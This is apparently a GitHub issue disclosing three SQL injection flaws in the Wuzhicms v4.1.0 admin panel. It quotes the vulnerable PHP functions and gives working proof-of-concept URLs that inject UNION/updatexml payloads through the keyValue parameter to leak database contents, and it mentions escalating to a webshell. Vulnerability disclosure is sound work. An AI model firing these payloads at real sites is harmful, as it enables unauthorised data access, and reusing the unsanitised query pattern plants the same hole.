Skip to content

There are 3 SQL injections in Wuzhicms v4.1.0 background #198

Open
@tcyba

Description

There are 3 SQL injections in Wuzhicms v4.1.0 background

one

Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability

Vulnerability file:

/coreframe/app/pay/admin/index.php 30-98

	public function listing(){
		$fieldtypes = array('订单号', '手机号', '所属客服', '经销商');
		$keytype = isset($GLOBALS['keytype']) ? intval($GLOBALS['keytype']) : 0;
		$payments = $this->payments;
		$status_arr = $this->status_arr;
		$page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
		$page = max($page, 1);
		$status = $GLOBALS['status'];

		if ($status) {
			$where = 'status=' . $status;
		} else {
			$where = 'status>0';
		}
		if ($keytype) {
			$where .= " AND `keytype`='$keytype'";
		}
		$keyValue = strip_tags($GLOBALS['keyValue']);
		$fieldtype = intval($GLOBALS['fieldtype']);
		if ($keyValue) {
			switch ($fieldtype) {
				case 0:
					$where .= " AND `order_no`='$keyValue'";
					break;
				case 1:
					$where .= " AND `telephone`='$keyValue'";
					break;
				case 2:
					$where .= " AND `kf_username`='$keyValue'";
					break;
				case 3:
					$where .= " AND `jxs_username`='$keyValue'";
					break;
			}
		}

		if ($_SESSION['role'] == 4) {
			//客服
			$kf_username = get_cookie('username');
			$where .= " AND `kf_username`='$kf_username'";
		}
		$starttime = '';
		$endtime = '';
		if ($GLOBALS['starttime']) {
			$starttime = strtotime($GLOBALS['starttime']);
			$where .= " AND `addtime`>'$starttime'";
		}
		if ($GLOBALS['endtime']) {
			$endtime = strtotime($GLOBALS['endtime']);
			$where .= " AND `endtime`<'$endtime'";
		}
		if(isset($GLOBALS['exp'])) {
			$pagesize = 1000;
		} else {
			$pagesize = 20;
		}

		$admin_result = $this->db->get_list('admin', array('role' => 4), '*', 0, 20, 0);
		$result = $this->db->get_list('pay', $where, '*', 0, $pagesize, $page, 'id DESC');
		if(isset($GLOBALS['exp'])) {
			$this->export_excel($result);
		}
		$pages = $this->db->pages;
		$total = $this->db->number;
		$pay_config = get_config('pay_config');
		load_class('form');

		include $this->template('listing');
	}

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

POC

/index.php?m=pay&f=index&v=listing&_su=wuzhicms&keyValue=1111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -

image-20210906122319748

image-20210906122347848

two

The second SQL injection and the first SQL injection are in a different function in the same file!

Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability

Vulnerability file:

/coreframe/app/pay/admin/index.php 244-289

public function relay(){
		$id = intval($GLOBALS['id']);
		$r = $this->db->get_one('pay', array('id' => $id));
		$r2 = $this->db->get_one('pay_detail', array('id' => $id));
		$r = array_merge($r, $r2);
		$keyValue = '';
		$keyType = '';
		if (isset($GLOBALS['keyType'])) {
			$keyType = $GLOBALS['keyType'];
			$keyValue = $GLOBALS['keyValue'];
			if ($keyValue) {
				$where = "modelid=11 AND `$keyType` LIKE '%$keyValue%'";
				$result = $this->db->get_list('member', $where, '*', 0, 20, 0, 'uid DESC');
			}
		} elseif (isset($GLOBALS['submit'])) {
			load_function('common', 'pay');
			$formdata = array();
			$formdata['order_no'] = create_order_no();
			$formdata['to_uid'] = intval($GLOBALS['to_uid']);
			$formdata['username'] = $r['linkman'];
			$formdata['mobile'] = $r['telephone'];
			$formdata['pinpai'] = $r['data1'];
			$formdata['chexing'] = $r['data3'];
			$formdata['addtime'] = $r['addtime'];
			$formdata['keytype'] = 0;//游客订单
			$formdata['zftime'] = SYS_TIME;
			$this->db->insert('demand_relay', $formdata);
			$formdata2 = array();
			$formdata2['op_uid'] = $_SESSION['uid'];
			$formdata2['to_uid'] = intval($GLOBALS['to_uid']);
			$formdata2['to_username'] = $GLOBALS['to_username'];
			$formdata2['updatetime'] = SYS_TIME;
			$this->db->insert('demand_history', $formdata2);
			// $this->db->update('demand', array('flag'=>1),array('did' => $did));
			$this->db->update('pay', array('jxs_username' => $formdata2['to_username']), array('id' => $id));
			$forward = strip_tags($GLOBALS['forward']);
			MSG('发送成功', $forward);
		} else {
			$uid = $_SESSION['uid'];
			$where = "op_uid='$uid'";
			$data = $this->db->get_one('demand_history', $where, '*', 0, 'hid DESC');
			$forward = strip_tags($GLOBALS['forward']);

		}
		include $this->template('pay_relay');
	}

Set $keyType=uid and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

POC

/index.php?m=pay&f=index&v=relay&_su=wuzhicms&keyType=uid&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -

image-20210906122742954

image-20210906123019431

three

Wuzhicms v4.1.0 /coreframe/app/order/admin/index.php hava a SQL Injection Vulnerability

Someone has submitted a SQL injection vulnerability in the file /coreframe/app/order/admin/index.php before (#175), but I found that in addition to the $flag parameter, it can be injected In addition, the $keyValue parameter can also be injected!

Vulnerability file:

coreframe/app/order/admin/index.php 22-87

public function listing() {
    load_class('form');
    $fieldtypes = array('订单ID','标题','下单会员','物流单号');
    $flag = $GLOBALS['flag'];
    $status = array();
    $status[1] = '待发货';
    $status[2] = '已发货';
    $status[3] = '订单完成';

    $status_arr = $this->status_arr;
    $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
    $page = max($page,1);
    $keyValue = strip_tags($GLOBALS['keyValue']);
    $fieldtype = intval($GLOBALS['fieldtype']);
    $where = '1';
    if($keyValue) {
        switch($fieldtype) {
            case 0:
                $where .= " AND `order_no`='$keyValue'";
                break;
            case 1:
                $where .= " AND `remark` LIKE '%$keyValue%'";
                break;
            case 2:
                $r = $this->db->get_one('member', array('username' => $keyValue));
                $uid = $r['uid'];
                $where .= " AND `uid`='$uid'";
                break;
            case 3:
                $where .= " AND `snid`='$keyValue'";
                break;
        }
    }
    if($flag!='' && $flag==0 || $flag) $where .=" AND `status`='$flag'";
    $starttime = '';
    $endtime = '';
    if($GLOBALS['starttime']) {
        $starttime = strtotime($GLOBALS['starttime']);
        $where .= " AND `addtime`>'$starttime'";
    }
    if($GLOBALS['endtime']) {
        $endtime = strtotime($GLOBALS['endtime']);
        $where .= " AND `addtime`<'$endtime'";
    }
    $result_arr = $this->db->get_list('order_point', $where, '*', 0, 20,$page,'orderid DESC');

Set $fieldtype=1 and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

POC

http://yyds.upload/index.php?m=order&f=index&v=listing&_su=wuzhicms&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -&fieldtype=1

image-20210906162438475

image-20210906162501868

Multiple SQL injection vulnerabilities exist in wuzhicms v4.1.0
Allows attackers to execute arbitrary SQL commands via the $keyValue parameter in the (1) / core / APP / order / admin / index.php file and the $keyValue parameter in the (2) / core / APP / pay / admin / index.php file.
https://github.com/wuzhicms/wuzhicms/issues/198

Vulnerability verification process(https://github.com/wuzhicms/wuzhicms/issues/198)

Use sql injection to elevate permissions and write webshell
Individual

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions